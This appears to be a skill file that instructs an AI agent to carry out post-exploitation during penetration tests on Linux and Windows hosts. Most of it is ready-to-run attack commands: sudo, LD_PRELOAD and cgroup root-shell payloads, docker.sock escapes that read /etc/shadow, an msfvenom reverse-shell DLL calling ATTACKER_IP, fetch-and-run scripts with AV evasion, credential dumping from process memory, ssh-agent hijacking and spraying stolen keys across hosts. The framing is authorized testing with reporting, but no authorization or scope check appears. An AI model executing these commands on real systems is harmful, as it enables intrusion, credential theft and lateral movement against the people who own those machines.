post-exploit

name: post-exploit description: | Post-exploitation workflow. Covers privilege escalation (Linux SUID/sudo/kernel, Windows UAC/service/token), persistence assessment, local enumeration, credential harvesting, and pivot preparation.

Structured workflows for Linux and Windows targets using impacket, netexec, john, linpeas/winpeas, and standard Kali tools. Includes kernel exploit reference tables, GTFOBins exploitation chains, Potato attack selection, Docker/container escapes, DLL hijacking, SSH key harvesting, credential recovery from memory, and Windows token manipulation. Chains from /pentester or /credential-audit when access is obtained. argument-hint: [os=linux|windows] [access=shell|ssh|rdp|winrm] [current-user=username] [depth=quick|standard|thorough] user-invocable: true

Post-Exploitation Workflow

You are an expert post-exploitation operator. You have initial access to a target system. Your goal: escalate privileges, harvest credentials, enumerate the local environment, assess persistence mechanisms, and prepare for lateral movement — all while documenting findings for the security report.

Request: $ARGUMENTS

CHAIN COMMITMENTS — DECLARE BEFORE STARTING

Read this before executing any workflow phase. Commit to MANDATORY chains before your first tool call.

Logging: Before invoking any skill above, call session(action="set_skill", options={"skill":"<name>","reason":"<why>","chained_from":"<this-skill>"}) — this writes the SKILL_CHAIN entry to pentest.log.

Tools Available

ATT&CK Coverage

Depth Presets

Privilege Escalation Decision Tree

Check highest-impact, lowest-effort paths first.

Linux:

1. `id` + `sudo -l`
   +-- NOPASSWD entry? ---------> Sudo Rule Exploitation (Phase 2A)
   +-- wildcard in sudo rule? --> Sudo Wildcard Abuse (Phase 2A)
   +-- env_keep LD_PRELOAD? ----> env_keep Exploitation (Phase 2A)
2. `find / -perm -4000 -type f 2>/dev/null`
   +-- GTFOBins binary? --------> GTFOBins Chains (Phase 2B)
   +-- Custom SUID binary? -----> strings/ltrace analysis
3. `uname -r` — check kernel
   +-- 5.8-5.16? ---------------> DirtyPipe CVE-2022-0847
   +-- < 6.4 with nf_tables? ---> Netfilter CVE-2023-32233
   +-- Ubuntu OverlayFS? -------> GameOver(lay) CVE-2023-2640/32629
4. `getcap -r / 2>/dev/null`
   +-- cap_setuid? --------------> Direct UID change
5. Container checks
   +-- docker.sock? ------------> Docker Socket Abuse (Phase 2D)
   +-- CAP_SYS_ADMIN? ----------> cgroup/mount escape (Phase 2D)
6. `cat /etc/crontab; ls -la /etc/cron*`
   +-- Writable cron script? ---> Replace with reverse shell

Windows:

1. `whoami /priv`
   +-- SeImpersonate? ----------> Potato Attacks (Phase 2C)
   +-- SeDebugPrivilege? -------> LSASS dump / process injection
   +-- SeBackupPrivilege? ------> SAM/SYSTEM/NTDS extraction
   +-- SeRestorePrivilege? -----> DLL overwrite
2. `wmic service get name,pathname | findstr /v system32`
   +-- Unquoted path? ----------> Unquoted service path exploit
   +-- Writable binary dir? ----> Service binary replacement
3. DLL hijacking — writable PATH dir? --> Phase 2E
4. AlwaysInstallElevated = 1? ---------> MSI privesc
5. Medium integrity + auto-elevate? ---> UAC bypass (fodhelper, eventvwr)

Workflow

Before running any tool

If OS or access method not specified, ask:

Target: <target> | OS: <linux/windows> | Access: <shell/ssh/rdp/winrm> | User: <username> Depth? quick ($0.10 · 15m · 10) | standard ($0.50 · 45m · 25) | thorough (unlimited) Any specific objectives? (privesc, credentials, pivot)

Phase 0 — Scope & Setup

0. session(action="start", options={...}) with target, depth, limits
1. report(action="dashboard", data={"port": 7777})
2. report(action="note", data={...}) — record OS, access method, current user/privileges
3. Windows standard+ only — pre-stage WinPEAS in Kali:

kali(command="curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -o /tmp/winPEASx64.exe && ls -la /tmp/winPEASx64.exe")

Phase 1 — Local Enumeration

quick depth — Decision Tree Inputs Only

Collect just enough to walk the Privilege Escalation Decision Tree. No full enumeration.

Linux:

kali(command="ssh user@TARGET 'id && sudo -l 2>&1'")
kali(command="ssh user@TARGET 'find / -perm -4000 -type f 2>/dev/null | head -30'")
kali(command="ssh user@TARGET 'uname -r && cat /etc/os-release 2>/dev/null | head -5'")

Windows:

kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /priv'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /all'")

Cross-user lateral movement — before escalating to root, check if you can pivot to another user on the same host who has higher privileges or different access:

• List all users and their home directories — look for readable scripts, config files, writable logs, shared directories
• Check what processes other users are running — any script or service that reads from a file you can write to is an injection vector
• If another user has a script that processes a log file, config file, or queue that you can append to, craft input that exploits how the script parses it (command injection via unsanitized fields, path traversal, etc.)
• Check sudo -l for the current user — sometimes you can sudo as a non-root user first, then escalate from them

After these, proceed directly to Phase 2 using the decision tree.

standard / thorough depth — PEAS-First Enumeration

Run PEAS first for comprehensive coverage. PEAS replaces ~15 manual enumeration commands with a single tool that checks hundreds of privesc vectors.

Linux — Run LinPEAS

kali(command="ssh user@TARGET 'curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh' 2>&1 | head -2000")

If curl is unavailable, transfer via base64 or SCP:

kali(command="curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | base64 -w0 > /tmp/lp.b64 && ssh user@TARGET 'cat | base64 -d | sh' < /tmp/lp.b64 2>&1 | head -2000")

Windows — Run WinPEAS

Method 1 — SMB upload (preferred):

kali(command="nxc smb TARGET -u USER -p PASS --put-file /tmp/winPEASx64.exe 'C:\\Users\\Public\\winPEASx64.exe'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'C:\\Users\\Public\\winPEASx64.exe quiet servicesinfo applicationsinfo windowscreds notcolor' 2>&1 | head -2000")

Method 2 — PowerShell download (if SMB fails):

kali(command="nxc smb TARGET -u USER -p PASS -x 'powershell -ep bypass -c \"IWR -Uri https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -OutFile C:\\Users\\Public\\wp.exe; C:\\Users\\Public\\wp.exe quiet notcolor\"' 2>&1 | head -2000")

Method 3 — PowerShell script (no binary drop, AV evasion):

kali(command="nxc smb TARGET -u USER -p PASS -x 'powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString(\\\"https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1\\\")\"' 2>&1 | head -2000")

Reading PEAS Output

PEAS produces thousands of lines. Focus on marked/highlighted findings:

LinPEAS key sections:

WinPEAS key sections:

Installed Software → Local Privilege Escalation

For every application and version listed in WinPEAS (or LinPEAS) output, search for local privilege escalation exploits. Third-party software is one of the most common privesc vectors — the application may run as SYSTEM, have writable directories, or have known vulnerabilities:

# List installed software with versions
kali(command="ssh user@TARGET 'dir \"C:\\Program Files\" && dir \"C:\\Program Files (x86)\"'")
# Or on Linux:
kali(command="ssh user@TARGET 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null' | head -50")

# For each application + version, search Exploit-DB
kali(command="searchsploit paperstream")
kali(command="searchsploit 'application name' privilege escalation local")

If an exploit is found, download and run it — many are PowerShell scripts or require placing a malicious DLL in a writable application directory.

Targeted Follow-Up

Run only if PEAS output was truncated or a section needs deeper inspection:

# Linux — if capabilities section was empty/truncated
kali(command="ssh user@TARGET 'getcap -r / 2>/dev/null'")

# Linux — clean sudo -l for decision tree (if PEAS sudo section unclear)
kali(command="ssh user@TARGET 'sudo -l 2>&1'")

# Linux — full cron detail if PEAS cron section was truncated
kali(command="ssh user@TARGET 'cat /etc/crontab 2>/dev/null && ls -la /etc/cron.d/ /etc/cron.daily/ 2>/dev/null'")

# Windows — clean whoami /priv for Potato selection
kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /priv'")

After enumeration: report(action="note", data={...}) with PEAS highlights + report(action="diagram", data={...}) with system topology.

Phase 2 — Privilege Escalation

Phase 2A — Sudo Rule Parsing and Exploitation

kali(command="ssh user@TARGET 'sudo -l 2>&1'")

Sudo wildcard abuse (e.g., sudo tar cf /dev/null /var/log/*):

kali(command="ssh user@TARGET 'cd /var/log && echo \"\" > \"--checkpoint=1\" && echo \"\" > \"--checkpoint-action=exec=sh shell.sh\" && echo -e \"#!/bin/bash\ncp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash\" > shell.sh && chmod +x shell.sh'")

env_keep exploitation — if sudo -l shows env_keep += LD_PRELOAD:

kali(command="ssh user@TARGET 'cat > /tmp/evil.c << \"CEOF\"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() { unsetenv(\"LD_PRELOAD\"); setuid(0); setgid(0); system(\"/bin/bash -p\"); }
CEOF
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c
sudo LD_PRELOAD=/tmp/evil.so <allowed_command>'")

Other exploitable env_keep variables: LD_LIBRARY_PATH (place malicious .so in writable path), PYTHONPATH (place malicious module that sudo Python script imports).

Phase 2B — GTFOBins Exploitation

Step 1 — Dynamic cross-reference

Cross-reference every SUID binary, sudo-allowed binary, and capability binary against the full GTFOBins database:

kali(command="ssh user@TARGET 'find / -perm -4000 -type f 2>/dev/null' > /tmp/suid_bins.txt && curl -s https://gtfobins.github.io/index.json | python3 -c '
import json, sys, os
gtfo = {b[\"name\"]: b.get(\"functions\", []) for b in json.load(sys.stdin)}
with open(\"/tmp/suid_bins.txt\") as f:
    for line in f:
        path = line.strip()
        name = os.path.basename(path)
        if name in gtfo:
            funcs = gtfo[name]
            tags = []
            if any(\"suid\" in str(fn).lower() for fn in funcs): tags.append(\"SUID\")
            if any(\"sudo\" in str(fn).lower() for fn in funcs): tags.append(\"sudo\")
            if any(\"capabilities\" in str(fn).lower() for fn in funcs): tags.append(\"cap\")
            print(f\"MATCH: {path} [{\" \".join(tags or [\"check\"])}] -> https://gtfobins.github.io/gtfobins/{name}/\")
' 2>/dev/null")

For sudo-allowed binaries:

kali(command="ssh user@TARGET 'sudo -l 2>&1' | grep -oP '\\S+$' | while read bin; do name=$(basename \"$bin\"); curl -sf \"https://gtfobins.github.io/gtfobins/$name/\" > /dev/null && echo \"MATCH: $bin -> https://gtfobins.github.io/gtfobins/$name/\"; done")

For capability binaries:

kali(command="ssh user@TARGET 'getcap -r / 2>/dev/null' | while read line; do bin=$(echo \"$line\" | awk '{print $1}'); name=$(basename \"$bin\"); caps=$(echo \"$line\" | grep -oP 'cap_\\w+'); curl -sf \"https://gtfobins.github.io/gtfobins/$name/\" > /dev/null && echo \"MATCH: $bin [$caps] -> https://gtfobins.github.io/gtfobins/$name/\"; done")

Step 2 — Exploitation reference table

Always check the GTFOBins page for the matched binary — the tables below are common examples, NOT an exhaustive list. GTFOBins is continuously updated with new binaries and techniques. If a binary matched in Step 1 but isn't in these tables, visit the GTFOBins URL from the match output for the exact exploit command.

For each match, use the appropriate exploitation technique. Organized by context:

Sudo NOPASSWD — shell escape / command execution:

SUID binary exploitation — run with -p flag to preserve elevated privileges:

Capability exploitation — when getcap shows capabilities on a binary:

Step 3 — Fallback for unknown binaries

If a SUID/sudo/capability binary is not in the tables above, check GTFOBins directly:

kali(command="curl -sf 'https://gtfobins.github.io/gtfobins/BINARY_NAME/' | grep -oP '(?<=<code>).*?(?=</code>)' | head -20")

Or use http(action="request", ...):

http(action="request", url="https://gtfobins.github.io/gtfobins/BINARY_NAME/", method="GET")

Parse the page for exploitation techniques under the relevant context (SUID, Sudo, Capabilities). Each GTFOBins page lists exploitation commands per context.

If the binary is not on GTFOBins, think about what it can do — not every sudo binary is a shell escape. Some are more valuable for other reasons:

Debugging/memory tools (gcore, gdb, strace, ltrace, perf, valgrind) — if you can sudo these, you can dump the memory of any privileged process. Look for processes running as root that might hold credentials (password managers, key stores, database connectors, web apps with DB passwords in memory):

# Find interesting privileged processes
ps -ef | grep -E "root.*(pass|secret|key|vault|store|db|mysql|postgres)"
# Dump process memory with gcore
sudo gcore PID
# Search the dump for credentials
strings core.PID | grep -iE "password|secret|token|key" | head -20
# Or with gdb
sudo gdb -p PID -batch -ex "gcore /tmp/dump" -ex quit

File manipulation tools (cp, mv, dd, tee, wget, curl) — if you can sudo these, you can read/write privileged files (shadow, passwd, SSH keys, configs).

Package/service tools (apt, pip, systemctl, service) — if you can sudo these, you can install backdoors or restart services with modified configs.

For any unlisted binary, analyze what it does:

kali(command="ssh user@TARGET 'strings /path/to/binary | grep -iE \"system|exec|popen|/bin/\" | head -20'")
kali(command="ssh user@TARGET 'ltrace /path/to/binary 2>&1 | head -30'")
kali(command="ssh user@TARGET 'strace -f /path/to/binary 2>&1 | grep -iE \"exec|open|connect\" | head -30'")

If strings/ltrace reveals the binary calls commands using relative paths (e.g. calls chmod, setuid, service, curl without /usr/bin/ prefix), this is a PATH hijack — one of the most common SUID privesc techniques:

1. Create a malicious script with the same name as the relative command (e.g. /tmp/setuid containing /bin/sh)
2. Make it executable
3. Prepend your directory to PATH: export PATH=/tmp:$PATH
4. Run the SUID binary — it executes your script with root privileges instead of the real command

Also check if the binary calls system() (which uses PATH) vs execve() (which uses absolute paths) — only system() is vulnerable to PATH hijack.

Linux Kernel Exploit Reference Table

Only attempt when simpler methods fail. Pre-check: uname -r && gcc --version && which curl wget

Always search dynamically first — new kernel CVEs are published constantly. These examples show the pattern, not an exhaustive list:

kali(command="searchsploit linux kernel $(ssh user@TARGET 'uname -r | cut -d- -f1')")
kali(command="searchsploit privilege escalation linux $(ssh user@TARGET 'uname -r | cut -d. -f1,2')")

Well-known examples (to demonstrate the download → compile → run pattern):

Phase 2C — Windows Privilege Escalation

Potato Attacks

Use when whoami /priv shows SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

Always search for the latest Potato variants — new ones are published regularly. Search dynamically first:

kali(command="searchsploit potato privilege escalation windows")
kali(command="searchsploit seimpersonate")

Download the binary to the target — serve from Kali via HTTP or SMB, then fetch on target:

# Kali: serve files via HTTP
kali(command="cd /tmp && wget -q https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe && python3 -m http.server 8888 &")

# Target: download via PowerShell or certutil
powershell -c "Invoke-WebRequest http://KALI_IP:8888/GodPotato-NET4.exe -OutFile C:\temp\gp.exe"
certutil -urlcache -split -f http://KALI_IP:8888/GodPotato-NET4.exe C:\temp\gp.exe

Well-known Potato variants (examples — new variants are published regularly, always search):

Selection: GodPotato first (broadest), PrintSpoofer on 2016/2019, JuicyPotato on pre-1809, RoguePotato when JuicyPotato fails on 1809+. If all fail, search for newer variants — CoercedPotato, LocalPotato, SharpEfsPotato, etc.

JuicyPotato CLSID: requires a valid CLSID for the target OS. Look up at https://ohpe.it/juicy-potato/CLSID/ or try {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} (BITS) as a common default.

Windows Token Manipulation

These are well-known privilege-to-attack mappings — but new token abuse techniques emerge. For any privilege not listed, search searchsploit <privilege_name> and check HackTricks:

SeBackupPrivilege — DC NTDS extraction:

kali(command="nxc smb TARGET -u USER -p PASS -x 'wmic shadowcopy call create Volume=C:\\'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit c:\\temp\\ntds.dit'")
kali(command="impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL")

Phase 2D — Docker / Container Escape

Negative finding rule: You MUST file a finding for container capability enumeration even when no escape is possible. A negative "container hardened — no escape vector" finding documents due diligence and prevents the report reader from wondering if this was skipped. Enumerate capabilities first, then attempt escapes based on what's present:

kali(command="ssh user@TARGET 'capsh --print 2>/dev/null; cat /proc/self/status | grep Cap; grep -i docker /proc/1/cgroup 2>/dev/null; ls -la /var/run/docker.sock 2>/dev/null; cat /.dockerenv 2>/dev/null && echo IN_CONTAINER'")

Then file a finding regardless of the outcome:

• If escape succeeded: severity=critical, document the technique
• If no escape vector found: severity=info, title "Container Escape: Not Exploitable", notes = capabilities listed, docker.sock status, cgroup write status

Detect container:

kali(command="ssh user@TARGET 'cat /proc/1/cgroup 2>/dev/null | grep -i docker && ls -la /.dockerenv 2>/dev/null'")

Docker socket abuse (docker.sock accessible):

# Mount host root into new container
kali(command="ssh user@TARGET 'docker run -v /:/hostfs --rm alpine chroot /hostfs /bin/bash -c \"id && cat /etc/shadow\"'")
# Privileged container with host namespaces
kali(command="ssh user@TARGET 'docker run --privileged --pid=host --net=host -v /:/hostfs --rm alpine chroot /hostfs /bin/bash'")
# Deploy SSH key to host root
kali(command="ssh user@TARGET 'docker run -v /:/h --rm alpine sh -c \"echo \\\"ssh-rsa AAAA...\\\" >> /h/root/.ssh/authorized_keys\"'")

cgroup escape (notify_on_release, inside container with cgroup write):

kali(command="ssh user@TARGET 'mkdir -p /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x && echo 1 > /tmp/cgrp/x/notify_on_release && host_path=$(sed -n \"s/.*upperdir=\\([^,]*\\).*/\\1/p\" /etc/mtab) && echo \"$host_path/cmd\" > /tmp/cgrp/release_agent && echo \"#!/bin/sh\" > /cmd && echo \"cat /etc/shadow > $host_path/out\" >> /cmd && chmod +x /cmd && sh -c \"echo \\$\\$ > /tmp/cgrp/x/cgroup.procs\"'")

CAP_SYS_ADMIN + mount (mount host disk):

kali(command="ssh user@TARGET 'capsh --print 2>/dev/null; mkdir -p /mnt/host && mount /dev/sda1 /mnt/host && ls /mnt/host/root/'")

nsenter escape (privileged + host PID ns):

kali(command="ssh user@TARGET 'nsenter -t 1 -m -u -i -n -p -- /bin/bash -c \"id && cat /etc/shadow\"'")

Phase 2E — DLL Hijacking (Windows)

Step 1 — Find writable PATH directories:

kali(command="nxc smb TARGET -u USER -p PASS -x 'for %d in (\"%PATH:;=\", \"%\") do @icacls \"%~d\" 2>nul | findstr /i \"(F) (M) (W) everyone users authenticated\"'")

Step 2 — Find DLL hijack targets:

Enumerate services with missing DLLs dynamically using Process Monitor or by checking known targets. These are common examples — DLL hijack opportunities depend on installed software and OS version:

For a more complete list, search dynamically:

kali(command="searchsploit dll hijack windows privilege")

DLL search order: app dir, system32, 16-bit, Windows dir, CWD, PATH.

Step 3 — Deploy and trigger:

kali(command="msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o /tmp/evil.dll")
kali(command="nxc smb TARGET -u USER -p PASS --put-file /tmp/evil.dll 'C:\\Users\\Public\\wlbsctrl.dll'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'sc stop IKEEXT && sc start IKEEXT'")

Phase 3 — Credential Harvesting

Linux Credentials

kali(command="ssh user@TARGET 'find / \\( -name \"*.conf\" -o -name \".env\" -o -name \"*.ini\" -o -name \"config.json\" -o -name \"config.yml\" -o -name \"config.yaml\" -o -name \"*.properties\" -o -name \"web.config\" \\) 2>/dev/null | xargs grep -l -i \"password\\|secret\\|token\\|dsn\\|connectionstring\" 2>/dev/null | head -20'")

If the current user is in the adm group (id output), auth and audit logs are readable and often contain passwords — the Linux audit daemon logs su/sudo attempts including the typed password in a hex-encoded data= field. Decode hex data with echo 'HEX' | xxd -r -p.

Hash cracking: kali(command="john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/shadow-hashes.txt")

SSH Key Harvesting and Reuse

# Step 1: Find all private keys
kali(command="ssh user@TARGET 'find / \\( -name id_rsa -o -name id_ed25519 -o -name id_ecdsa -o -name \"*.pem\" \\) 2>/dev/null | while read f; do echo \"=== $f ($(stat -c %U $f)) ===\"; head -2 \"$f\"; done'")

# Step 2: Map trust via authorized_keys
kali(command="ssh user@TARGET 'find / -name authorized_keys 2>/dev/null | while read f; do echo \"=== $f ===\"; awk \"{print NR, \\$NF}\" \"$f\"; done'")

# Step 3: Discover targets from known_hosts
kali(command="ssh user@TARGET 'find / -name known_hosts 2>/dev/null | while read f; do awk \"{print \\$1}\" \"$f\"; done | sort -u'")

# Step 4: SSH agent hijacking
kali(command="ssh user@TARGET 'find /tmp -name \"agent.*\" -type s 2>/dev/null'")
kali(command="ssh user@TARGET 'export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.PID && ssh-add -l'")
kali(command="ssh user@TARGET 'export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.PID && ssh -o StrictHostKeyChecking=no root@10.0.0.5 id'")

# Step 5: Test keys against discovered hosts
kali(command="for key in /tmp/stolen_keys/*; do for host in $(cat /tmp/targets.txt); do ssh -i $key -o BatchMode=yes -o ConnectTimeout=3 root@$host 'hostname && id' 2>/dev/null && echo \"SUCCESS: $key -> $host\"; done; done")

Credential Harvesting from Memory

# Dump env vars from all accessible processes
kali(command="ssh user@TARGET 'for pid in $(ls /proc/ | grep -E \"^[0-9]+$\"); do strings /proc/$pid/environ 2>/dev/null | grep -iE \"(PASS|SECRET|TOKEN|API)=\" && echo \"[PID:$pid $(cat /proc/$pid/cmdline 2>/dev/null | tr \"\\0\" \" \")]\"; done 2>/dev/null | head -50'")

# Extract strings from process heap (requires root)
kali(command="ssh user@TARGET 'PID=$(pgrep -f apache2 | head -1) && cat /proc/$PID/maps | grep heap | awk -F\"[- ]\" \"{printf \\\"dd if=/proc/$PID/mem bs=1 skip=\\$((16#%s)) count=\\$((16#%s - 16#%s)) 2>/dev/null\\n\\\", \\$1, \\$2, \\$1}\" | sh | strings | grep -iE \"password|secret\" | head -20'")

# SSH key recovery from ssh-agent memory
kali(command="ssh user@TARGET 'for pid in $(pgrep ssh-agent); do cat /proc/$pid/mem 2>/dev/null | strings | grep -A 30 \"BEGIN.*PRIVATE KEY\" | head -40; done'")

# Browser credentials — Chrome Login Data and Firefox logins.json
kali(command="ssh user@TARGET 'find / -path \"*/.config/google-chrome/Default/Login Data\" -o -path \"*/.mozilla/*/logins.json\" 2>/dev/null'")

Windows Credentials

Phase 4 — Persistence Assessment (standard+)

Linux Persistence Vectors

Windows Persistence Vectors

Phase 5 — Pivot Preparation (thorough)

kali(command="ssh user@TARGET 'arp -a && cat /etc/hosts && ip neigh'")
kali(command="ssh user@TARGET 'for port in 22 80 443 445 3389 5985 8080; do (echo > /dev/tcp/10.0.0.1/$port) 2>/dev/null && echo 10.0.0.1:$port open; done'")
kali(command="nxc smb 10.0.0.0/24 -u HARVESTED_USER -p HARVESTED_PASS")
kali(command="ssh -i /tmp/stolen_key -o StrictHostKeyChecking=no user@10.0.0.5 'hostname && id'")

Call report(action="diagram", data={...}) with pivot map:

flowchart TD
    Init["Compromised: 10.0.0.10"] --> Cred["Cred Reuse"]
    Cred --> DB["10.0.0.5 (mysql)"]
    Cred --> Bak["10.0.0.20 (backup)"]
    Init --> Key["SSH Key Reuse"]
    Key --> Adm["10.0.0.2 (admin)"]
    Adm --> DC["10.0.0.1 (DC)"]

Phase 6 — Verification & PoC

For every confirmed finding:

1. report(action="note", data={...}) explaining the finding
2. Document exact reproduction steps
3. http(action="save_poc", ...) with descriptive title (e.g., privesc-suid-python3)
4. report(action="finding", data={...}) — severity: Critical (root/SYSTEM), High (privesc), Medium (cred exposure). Include ATT&CK ID and raw evidence.

Phase 7 — Report & Wrap-Up

1. report(action="diagram", data={...}) — complete post-exploitation map: access, privesc path, creds, persistence, lateral movement
2. report(action="note", data={...}) with summary:

Post-Exploitation Summary:
  Initial access:        [method, user, privileges]
  Privilege escalation:  [method or "not achieved"]
  Credentials harvested: [count, types]
  Persistence vectors:   [count, types]
  Lateral movement:      [reachable hosts, results]

3. session(action="complete", options={...}) with summary

Chaining Other Skills

Context Recovery After Compaction

When your context is compacted mid-skill:

1. Call session(action="recovery") before doing anything else — returns tools_already_run, in_progress_cells, pending_escalations, and EXECUTE_NOW
2. Resume in_progress cells first — notes record which privesc vectors were partially enumerated or attempted
3. Follow pending_escalations — escalation leads from findings (e.g., "crack hash from /etc/shadow", "test SUID binary X") that were not yet completed
4. Skip enumeration steps in tools_already_run — do not re-run linpeas/winpeas if already in the log
5. Never mark a privesc finding from memory — after compaction, re-run the confirming command before reporting

Rules

• session(action="start", options={...}) is mandatory — never run any other tool before it
• Batch independent tools in the same response — they execute in parallel
• When any tool returns a LIMIT message, stop immediately and call session(action="complete", options={...})
• Follow the decision tree — check sudo/SUID before kernel exploits, check token privileges before Potato selection
• Enumerate before escalating — understand the system before attempting privesc
• Harvest everything — config files, history, SSH keys, process memory, credential stores
• Call report(action="finding", data={...}) for every finding — privesc paths, exposed credentials, persistence vectors
• Use report(action="note", data={...}) liberally — document decisions and discoveries
• Never fabricate findings — only report what commands confirm
• Mermaid syntax rules: use flowchart TD, quote labels, no em-dashes, short alphanumeric node IDs
• Call session(action="stop_kali") at the end if kali(command=...) was used